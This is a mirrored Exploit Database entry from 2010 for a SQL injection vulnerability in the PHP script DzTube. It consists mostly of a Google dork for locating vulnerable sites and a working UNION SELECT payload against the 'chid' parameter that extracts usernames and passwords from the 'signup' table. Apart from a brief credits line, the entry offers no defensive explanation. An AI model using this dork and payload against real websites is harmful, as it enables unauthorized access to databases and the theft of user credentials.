DzTube – SQL Injection

• Exploit Database
• 12 阅读

• 作者： errnick qwe
  日期： 2010-12-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15847/

• Title: DzTube SQL Injection Vulnerability
  Discovered: ErrNick
  Site: xaknet.ru
  Date: 28/12/2010
  Vendor: n/a
  d0rK: inurl:"channel_detail.php?chid="
  
  Exploit: host.com/channel_detail.php?chid=[SQL]
  
  Demo:
  http://site/channel_detail.php?chid=-51+union+select+1,username,pwd,4,5,6,7,8,9,0,1,2,3,4,5,6+from+signup
  
  
  Greatz: to xaknet.ru vulnes.com